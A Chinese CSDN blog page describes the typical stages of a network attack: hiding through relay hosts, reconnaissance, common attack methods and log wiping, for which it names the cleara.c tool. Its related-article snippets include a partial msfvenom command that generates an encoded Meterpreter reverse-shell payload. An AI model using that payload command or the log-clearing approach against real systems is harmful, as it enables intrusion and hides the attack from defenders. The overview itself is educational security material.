黑客的一次攻击行为

最新推荐文章于 2023-02-09 10:57:40 发布
VIP文章 最新推荐文章于 2023-02-09 10:57:40 发布
阅读量431 收藏 1
点赞数
分类专栏: 云计算&网络安全知识学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29406309/article/details/104968502
版权

主要由:隐藏自己 -- 预攻击探测 -- 攻击行为 -- 擦除痕迹 四个步骤构成。

 

一般完整的攻击过程都是先隐藏自身,在隐藏好自己后再进行预攻击探测,检测目标机器的各种属性和具备的被攻击条件,然后采取相应的攻击方法进行破坏,达到自己的目的,之后攻击者会删除自己的行为日志。

1 隐藏自己

常见的攻击者隐藏自身的方式有以下几种:

从已经取得控制权的主机上通过telnet或rsh跳跃。

从windows主机上通过wingates等服务进行跳跃。

利用配置不当的代理服务器进行跳跃。

利用电话交换技术先通过拨号找寻并连入某台主机,然后通过这台主机再连入internet来跳跃。

2 预攻击探测

 

    这步的主要任务是收集有关要攻击目标的有用的的信息。这些信息包括目标计算机的硬件信息、目标计算机的用户信息、存在的漏洞等。

 

    通常是从已经攻入的系统中的.rhosts和.netrc文件中将所列的机器挑选出来,从系统的/etc/hosts文件中可以得到一个很全的主机列表。但大多数情况下,选定一个攻击目标是一个比较盲目的过程,除非攻击者有很明确的目的和动机。攻击者也可能找到dns表,通过dns可以知道机器名、ip地址、机器类型、甚至还可以知道机器的主人和单位。

 

3 采取攻击行为

 

    在攻击探测中如果攻击者发现目标机器系统有可以被利用的漏洞或弱点,则立即采取攻击行为。在此过程中具体采用的攻击行为要视目标机器系统而定,目前较流行的手段有暴力破解、缓冲区益出、跨站脚本、拒绝服务、欺骗等。

 

4 清除痕迹

 

    攻击者清除攻击痕迹的方法主要是清除系统和服务日志。有些工具可以清除日志,如THC提供的cleara.c。

最低0.47元/天 解锁文章
喃喃不爱说话
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全攻击技术.pptx
06-09
4、合作的精神 成功的一次入侵和攻击,在目前的形式下,单靠一个人的力量已经没有办法完成了,通常需要数人,数百人的通力协作才能完成任务,互联网提供了不同国家黑客交流合作的平台。 网络安全攻击技术全文共49页...
网络安全攻击流程2
m0_66893408的博客
05-21 724
黑客攻击的流程我们会讲解6个步骤 黑客攻击是很多种的 但是一般来说 黑客攻击的流程都是相似的第一步 扫描漏洞目前 Windows 不断在更新和提升 (安全也在不断的提升)不管这么更新 它都会存在一些安全隐患和缺点(漏洞)互联网上就有很多专业的工具发现这些漏洞 然后使用病毒和木马利用这些漏洞来进行一个攻击2 试探漏洞了解计算机存在的一个漏洞 黑客就可以利用(缓冲区溢出 和 测试用户名和密码).......来实现对目标的一个试探的一个攻击假设 58.221.6.1:3389user:administrat..
入侵过程-入侵阶段介绍(一)预攻击阶段
C_SF_C
02-19 2866
01-入侵过程-入侵阶段介绍(一)预攻击阶段 主要内容 入侵阶段包含:预攻击阶段、攻击阶段、后攻击阶段 预攻击阶段 信息收集 为实施攻击进行的提前探测活动,为后续攻击打下基础 这一阶段收集的信息包括:网络信息(域名、IP地址、网络拓扑)、系统信息(操作系统版本、开放的各种网络服务版本)、用户信息(用户标识、组标识、共享资源、即时通信软件账号、邮件账号)等 信息收集方式 被动收集 被动收集:在其他...
[计网:原理与实践] 第七章:网络安全(课后习题整理)
weixin_46952991的博客
08-11 3778
第七章 网络安全 7-1 举例说明计算机网络可能面临的安全威胁。网络需要哪些安全服务?   预攻击探测:在进行网络攻击前,入侵者想方设法了解该网络中计算机的IP地址、所用操作系统、所运行的程序以及存在的漏洞。使攻击具有针对性。   分组嗅探:利用分组嗅探器接收流经该设备的分组,获取信息。   IP哄骗:若用户对端系统的操作系统拥有绝对控制权,就能将任意IP地址放入数据的源地址字段,伪造源地址的数据包。   TCP劫持:入侵者设法劫持某主机和某服务器之间的TCP连接,从而获取对服务器的全部控制权。   拒绝服
漏洞和网络扫描相关知识
2201_75857869的博客
02-09 305
插件编写规范化后,用户自己都可以编写插件来扩充漏洞扫描软件的功能,这种技术使漏洞扫描软件的升级维护变得相对简单,而专用脚本语言的使用也简化了编写新插件的工作,使漏洞扫描软件具有强的扩展性。漏洞扫描技术的原理是检查目标主机是否存在漏洞,在端口扫描后得知目标主机开启的端口以及端口上的网络服务,将这些相关信息与网络漏洞扫描系统提供的漏洞库进行匹配,查看是否存在满足匹配条件的漏洞,通过模拟黑客攻击手法,对目标主机系统进行攻击性的安全漏洞扫描,若模拟攻击成功,则表明目标主机系统存在安全漏洞。
实时检测攻击行为 9种IDS入侵检测系统方法
KingXai的专栏
11-25 5004
入侵检测系统,英文简写为IDS,顾名思义,它是用来实时检测攻击行为以及报告攻击的。如果把防火墙比作守卫网络大门的门卫的话,那么入侵检测系统(IDS)就是可以主动寻找罪犯的巡警。 因而寻求突破IDS的技术对漏洞扫描、脚本注入、URL攻击等有着非凡的意义,同时也是为了使IDS进一步趋向完善。 Snort是很多人都在用的一个IDS了,其实它也并不是万能的,笔者下面就来谈谈突破诸如Snort这类
一次linux服务器入侵应急响应(小结)
01-10
近日接到客户求助,他们收到托管电信机房的信息,通知检测到他们的一台服务器有对外发送攻击流量的行为。希望我们能协助排查问题。 一、确认安全事件 情况紧急,首先要确认安全事件的真实性。经过和服务器运维人员...
网络安全知识竞赛小测试--网络攻击技术.pdf
06-09
一种病毒的名称 20、TCP SYN 泛洪攻击的原理是利用了( )[单选题] * A.TCP 三次握手过程(正确答案) B.TCP 面向流的工作机制 C.TCP 数据传输中的窗口技术 D.TCP 连接终止时的 FIN 报文 21、以下对 TCP 协议发起连接...
Kali Linux 网络安全渗透测试
06-14
现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018年报告的信息安全事件比2017年有所增加,一年几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都...
网络安全论文.doc
06-10
广义上说,会话劫持就是在一 次正常的通信过程中,黑客作为第三方参与到其中,或者是在数据流(例如基于TCP的会 话)里注射额外的信息,或者是将双方的通信模式暗中改变,即从直接联系变成 有黑客联系。 会话劫持...
最常见网络攻击详细分析
09-04
最常见网络攻击详细分析:网络攻击步骤、预攻击探测、漏洞扫描(综合扫描)、木马攻击、拒绝服务攻击、欺骗攻击、蠕虫病毒攻击、其他攻击。详细描述请见文档。
攻击行为检测规律
qq_46329726的博客
01-28 4946
使用snort设置rule实现报警检测
使用机器学习异常检测攻击行为
focus on security
12-13 1263
一般现有的内部威胁检测算法都会被转化为异常检测来做,我个人认为在内部威胁检测领域除了异常检测这一killing part之外,识别攻击动机以及区分异常和攻击也是重点(大型立flag现场:另一篇论文中了,我就写这个),首先这篇文章就对现有的异常检测算法做一个综述。 异常检测算法 内部威胁检测主要是基于用户的网络、文件、设备、邮件等审计日志构建正常用户行为模型,之后使用包括图、机器学习、集成学习等方法对当前行为进行异常检测。 •基于机器学习的异常检测方法 使用包括SVM、朴素贝叶斯等方法对用户行为模型.
黑客常见攻击流程
小旺的博客
05-22 6833
黑客一般攻击的流程 第1步:预攻击探测 这一阶段主要为信息收集,收集的信息包括网络信息(域名、IP地址、网络拓扑)、系统信息(操作系统版本、开放的各种网络服务版本)、用户信息(用户标识、组标识、共享资源、即时通信软件账号、邮件账号)等。 收集信息的方法或工具 (1)SNMP协议。用它来查阅非安全路由器的路由表,从而了解目标机构网络拓扑的内部细节。 (2)TraceRoute程序。用它能够得出到达目标主机所要经过的网络数和路由器数。 (3)Whois协议。它是一种信息服务,能够提供有关所有DNS域和负责各
学习:一次完整的攻击
sanMu_blog的博客
08-27 2448
完整攻击链大概包括信息搜集、漏洞利用、建立据点、权限提升、权限维持、横向移动、痕迹清除等七步,虽然这个站点只经历了前四步,但也具有较强的代表性,组合利用漏洞形成攻击连,拿下管理权限。 强烈推荐学习,链接如下: 全程带阻:记一次授权网络攻防演练(上) 全程带阻:记一次授权网络攻防演练(下) ...
黑客攻击的一般流程
路雪军 Carl
04-15 6191
 一般完整的攻击过程都是先隐藏自身,在隐藏好自己后再进行攻击探测,检测目标机器的各种属性和具备的被攻击条件,然后采取相应的攻击方法进行破坏,达到自己的目的,之后攻击者会删除自己的行为日志。1 隐藏自己常见的攻击者隐藏自身的方式有以下几种: 从已经取得控制权的主机上通过telnet或rsh跳跃。 从windows主机上通过wingates等服务进行跳跃。
一次攻击(mateploit攻击windows 10总结)
九层台
10-26 4983
攻击机:kali2018.3(需要一个metaploit) 受攻击者:windows10(需要关掉杀软,windows自带的也要关掉) 0x01生成 windows $msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | \ msfv...
一次完整的攻击
Hello_super的博客
09-17 459
一次完整的攻击链 完整攻击链大白包括信息搜集、漏洞利用、建立据点、权限提升、权限维持、横向移动、痕迹清楚的七步,虽然这个站点只经历了前四步,但也具有较强的代表性,组合利用漏洞形成攻击链,拿下管理权限。 全程带阻:记一次授权网络攻防演练(上) 全程带阻:记一次授权网络攻防演练(下) ...
rsh, rexec教程
专注Linux开发
10-29 2354
介绍<br />rsh和rexec用来从远程机器执行命令,然后把结果返回到host上。因为Linux默认的安全性做的很好,需要有很多设置才能完成rsh,rexc的功能。尤其像目前项目的需要是用root来远程执行一系列命令。<br /> 设置<br /><br />如果把执行的机器称为master,目标机器称为slave。则你需要在slave机器上先做以下配置。<br /> <br />1. yum install -y rsh-server<br />2. cd /etc/xinetd.d/, change
黑客does攻击简单
最新发布
04-14
黑客攻击是指未经授权的个人或组织通过利用计算机系统中的漏洞或弱点,获取、修改或破坏目标系统中的数据或资源的行为。黑客攻击可以分为多种类型,包括但不限于以下几种: 1. 钓鱼攻击黑客通过伪装成合法的实体...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值